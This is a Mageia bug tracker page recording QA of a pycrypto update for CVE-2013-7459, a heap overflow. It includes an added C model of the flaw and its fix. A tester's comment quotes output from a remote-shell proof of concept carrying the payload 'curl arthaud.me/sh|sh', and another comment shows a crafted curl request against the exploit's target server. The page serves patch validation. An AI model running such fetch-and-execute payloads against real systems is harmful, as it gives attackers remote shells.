Bug 20031 - python-pycrypto new security issue CVE-2013-7459
Summary: python-pycrypto new security issue CVE-2013-7459
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 5
Hardware: All
OS: Linux
Priority: Normal
Severity: normal
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: https://lwn.net/Vulnerabilities/710478/
Whiteboard: MGA5-64-OK MGA5-32-OK advisory
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2016-12-27 19:34 CET by David Walser
Modified: 2017-02-02 09:12 CET
CC: 4 users

See Also:
Source RPM: python-pycrypto-2.6.1-8.mga6.src.rpm
CVE: CVE-2013-7459
Status comment:


Attachments
Random output test for python[3]-pycrypto (821 bytes, text/plain), 2017-01-08 15:00 CET, Lewis Smith
POC for this bug, Python script to get a remote shell. (873 bytes, text/plain), 2017-01-08 15:17 CET, Lewis Smith

Description David Walser 2016-12-27 19:34:34 CET
A CVE has been assigned for a security issue fixed upstream in python-pycrypto:
http://openwall.com/lists/oss-security/2016/12/27/8

The upstream commit to fix the issue is linked in the message above.  It sounds like it's non-trivial to backport to 2.6.1.  It also sounds like a serious issue.

Mageia 5 is also affected.
David Walser 2016-12-27 19:34:44 CET

Whiteboard: (none) => MGA5TOO

Comment 1 Philippe Makowski 2016-12-28 14:19:45 CET
python-pycrypto-2.6.1-6.1.mga5
python3-pycrypto-2.6.1-6.1.mga5

from python-pycrypto-2.6.1-6.1.mga5.src.rpm
are in 5/core/updates_testing

This is a security fix for a possible buffer overflow.

ref :
http://openwall.com/lists/oss-security/2016/12/27/8
https://github.com/dlitz/pycrypto/commit/8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4
https://marc.info/?l=oss-security&m=148280482630855&w=2


Cauldron is also patched.
The rpm has its own test suite, run during the build, including for this issue.

Whiteboard: MGA5TOO => (none)
CVE: (none) => CVE-2013-7459
Assignee: makowski.mageia => qa-bugs
Version: Cauldron => 5
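
The block below is an added illustration, not code from this page or from pycrypto itself. It models the bug class behind CVE-2013-7459 on the reading of the upstream commit linked above: the cipher constructor (ALGnew in block_template.c) validated the IV length only for the modes that use an IV, yet still copied the caller's IV, with the caller's length, into a fixed block-sized field, so a request in ECB or CTR mode with an oversized IV wrote past the end of the heap-allocated cipher object. The struct layout, the function names and the 16-byte block size are assumptions made for the demonstration; the fixed variant follows the rule the commit introduces, that ECB and CTR accept no IV at all and every other mode must receive exactly one block.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified model of a pycrypto-style block-cipher object (assumed
 * layout; the real ALGobject also carries a PyObject header, a counter
 * callback and the key schedule).  BLOCK_SIZE 16 matches AES. */
#define BLOCK_SIZE 16
enum { MODE_ECB = 1, MODE_CBC = 2, MODE_CFB = 3, MODE_OFB = 5, MODE_CTR = 6 };

typedef struct {
    int mode;
    unsigned char IV[BLOCK_SIZE];
    unsigned char oldCipher[BLOCK_SIZE];
    int count;
} cipher_obj;

/* Pre-fix logic: how many caller-supplied bytes reach memcpy(obj->IV, IV, n).
 * Returns -1 when the constructor rejects the call.  The length check is
 * skipped for ECB and CTR, so those modes accept any IV length and the
 * copy then runs past the 16-byte field: that is the heap overflow. */
static long iv_copy_len_vulnerable(int mode, size_t IVlen)
{
    if (mode != MODE_ECB && mode != MODE_CTR && IVlen != BLOCK_SIZE)
        return -1;                      /* "IV must be 16 bytes long" */
    return (long)IVlen;                 /* memcpy(new->IV, IV, IVlen) */
}

/* Post-fix logic: modes that do not use an IV must not be given one, and
 * modes that do must get exactly one block.
 * 0 = accepted, 1 = IV not allowed for this mode, 2 = wrong IV length. */
static int iv_check_fixed(int mode, size_t IVlen)
{
    if (mode == MODE_ECB || mode == MODE_CTR)
        return IVlen == 0 ? 0 : 1;
    return IVlen == BLOCK_SIZE ? 0 : 2;
}

/* Constructor with the hardened check: every byte that reaches memcpy
 * has already been proven to fit in obj->IV.  Returns NULL on rejection. */
static cipher_obj *cipher_new_fixed(int mode, const unsigned char *IV, size_t IVlen)
{
    if (iv_check_fixed(mode, IVlen) != 0)
        return NULL;
    cipher_obj *obj = calloc(1, sizeof *obj);
    if (obj == NULL)
        return NULL;
    obj->mode = mode;
    if (IVlen != 0)
        memcpy(obj->IV, IV, IVlen);     /* IVlen == BLOCK_SIZE here */
    return obj;
}

int main(void)
{
    /* Constructed inputs: IV lengths a request could plausibly send. */
    size_t lens[] = { 0, 15, 16, 1000 };
    int modes[] = { MODE_ECB, MODE_CBC, MODE_CTR };
    for (size_t m = 0; m < 3; m++) {
        for (size_t i = 0; i < 4; i++) {
            long n = iv_copy_len_vulnerable(modes[m], lens[i]);
            int rc = iv_check_fixed(modes[m], lens[i]);
            printf("mode %d IVlen %4zu: pre-fix %s, post-fix %s\n",
                   modes[m], lens[i],
                   n < 0 ? "rejected" : n > BLOCK_SIZE ? "OVERFLOW" : "copied",
                   rc == 0 ? "accepted" : "rejected");
        }
    }
    return 0;
}
```

The vulnerable path is represented only by the length it would hand to memcpy; calling the real thing with a 1000-byte IV corrupts the heap, which is the whole point of the advisory. With the upstream fix applied, the same condition surfaces at the Python level as a ValueError when any IV is passed to an ECB or CTR cipher, or when a non-block-sized IV is passed to CBC, CFB or OFB, which is a quicker local check than an hours-long remote PoC.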

David Walser 2017-01-03 20:34:16 CET

URL: (none) => https://lwn.net/Vulnerabilities/710478/

Comment 2 Lewis Smith 2017-01-08 14:55:04 CET
Prior to testing.
The most recent python-pycrypto bug:
 https://bugs.mageia.org/show_bug.cgi?id=11491#c0
has some code for *that* problem which I shall attach here simply because it uses the same package. The output (after that old update) should be random.

 https://marc.info/?l=oss-security&m=148280482630855&w=2
is a fantastically detailed & precise analysis of the bug, with a code exploit which I also will attach here. More 'for the record', since it concludes:
"After a few hours, I finally got a shell!"

CC: (none) => lewyssmith

Comment 3 Lewis Smith 2017-01-08 15:00:23 CET
Created attachment 8841 [details]
Random output test for python[3]-pycrypto

From bug 11491, this is just a little python script which uses the python-pycrypto package. The 4 lines of output should be random.
 $ python[3] cryptoRandom.py
Comment 4 Lewis Smith 2017-01-08 15:17:40 CET
Created attachment 8842 [details]
POC for this bug, Python script to get a remote shell.

From https://marc.info/?l=oss-security&m=148280482630855&w=2 for info only.
Written for Python3; may work for earlier.
Expect it to run for hours before (pre-update only) giving a shell.
Comment 5 Lewis Smith 2017-01-08 15:29:55 CET
Testing M5_64

BEFORE update:
 python-pycrypto-2.6.1-6.mga5
 python3-pycrypto-2.6.1-6.mga5
$ python cryptoRandom.py 
[u'11ebfa07b917df5b,1643424639ad0df8',
 u'1c75461b81e3808f,7476bd90682ace47',
 u'3de101081f86ac97,514d5e1c4abb325e',
 u'c62efc43f35b0b0b,14799ad508334985']
$ python3 cryptoRandom.py
[similar sort of O/P]

AFTER update:
 python-pycrypto-2.6.1-6.1.mga5
 python3-pycrypto-2.6.1-6.1.mga5
$ python cryptoRandom.py
[similar sort of correct O/P as previously]
$ python3 cryptoRandom.py
[similar sort of correct O/P as previously]

So the package still works, although its long POC was not specifically tested.
From Comment 1 "rpm have it own test suite run during the build, including for this issue." OK.

Whiteboard: (none) => MGA5-64-OK

Comment 6 Lewis Smith 2017-01-08 20:49:27 CET
Advisory created from Comment 1, title, the references.

Whiteboard: MGA5-64-OK => MGA5-64-OK advisory

Comment 7 Len Lawrence 2017-02-01 18:34:08 CET
Testing on i586 virtualbox.
Thanks for the upload Lewis.

Before updating:
$ python cryptoRandom.py 
[u'42364207b0dce3c2,29364e940c3c17c9',
 u'50a9812b90741463,3035440668d34d67',
 u'e8bfa75fdf36ad24,d2678147321a44a6',
 u'f2480379ff1dddac,64aba216bbe90636']
$ python3 cryptoRandom.py
['050e5d799b3ab7c8,26529743331d7995',
 '1d1bfaea7011db37,63d5549433c22325',
 '86c19227a42ef910,88527138e99cfe25',
 'a5a45316ae36ed16,9197abb3d58ed85b']

Running 'python getShell.py' fails on a syntax error.
Noting that the original was written for python3 I tried

$ python3 getShell.py

The syntax was accepted but the terminal filled with hundreds of echoes of the 'curl arthaud.me/sh|sh' command and ended on a connection failure:
curl%20arthaud.me%2fsh%7csh%00%00%00%d6%80%15%08 (Caused by ProtocolError('Connection aborted.', ConnectionRefusedError(111, 'Connection refused')))

I wonder if the address targeted needs to be changed to something accessible.  No clue really.
$ dig 136.243.194.56
did not provide any useful information.
$ nslookup 136.243.194.56
Server:		192.168.1.1
Address:	192.168.1.1#53

Non-authoritative answer:
56.194.243.136.in-addr.arpa	name = ip-136-243-194-56.bb.netbynets.de.

Maybe a German broadband provider?

Worth trying after the update though.

CC: (none) => tarazed25

Comment 8 Len Lawrence 2017-02-01 18:48:01 CET
After the update the functionality test worked fine as before, with python and python3.

The PoC test with python3 behaved just as before with a final "Connection refused".
Should the attempt to get a remote shell have been thwarted immediately if the fix had worked?  I defer to a higher authority.
Comment 9 Len Lawrence 2017-02-01 18:57:13 CET
Also tried this:
$ curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg=AAAAAAAAAAAAAAAA&keyAAAAAAAAAAAAAAAA&mode=42&iv=AAAAAAAAAAAAAAAA"
curl: (7) Failed to connect to 136.243.194.56 port 8000: Connection refused
Comment 10 Philippe Makowski 2017-02-01 21:43:51 CET
(In reply to Len Lawrence from comment #8)
> After the update the functionality test worked fine as before, with python
> and python3.

so you can validate

> The PoC test with python3 behaved just as before with a final "Connection
> refused".
> Should the attempt to get a remote shell have been thwarted immediately if
> the fix had worked?  I defer to a higher authority.
the security issue is tested during the rpm build.

CC: (none) => makowski.mageia

Comment 11 Len Lawrence 2017-02-01 21:52:06 CET
Thanks Philippe.  Letting it go then.
Len Lawrence 2017-02-01 21:52:39 CET

Keywords: (none) => validated_update
Whiteboard: MGA5-64-OK advisory => MGA5-64-OK MGA5-32-OK advisory
CC: (none) => sysadmin-bugs

Comment 12 Mageia Robot 2017-02-02 09:12:32 CET
An update for this issue has been pushed to the Mageia Updates repository.

http://advisories.mageia.org/MGASA-2017-0032.html

Resolution: (none) => FIXED
Status: NEW => RESOLVED

